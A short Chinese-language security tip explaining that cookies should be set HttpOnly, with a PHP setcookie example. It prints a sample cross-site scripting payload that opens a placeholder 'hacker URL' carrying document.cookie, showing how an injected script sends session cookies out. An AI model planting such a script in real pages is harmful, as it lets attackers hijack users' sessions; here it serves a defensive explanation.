1.生成cookie的时候设置httponly为true
如果脚本王子在A网站写入一段js代码:
<script>
window.open('黑客的url?c='+document.cookie)
</script>
当用户访问到这个页面的时候,就把当前用户在A网站的cookie发送到黑客的网站,这样黑客就顺利拿到这个cookie,就可以冒充当前用户了。
设置cookie的时候要开启httponly,让浏览器拿不到cookie。
setcookie ($name, $value = null, $expire = null, $path = null, $domain = null, $secure = null, $httponly = true)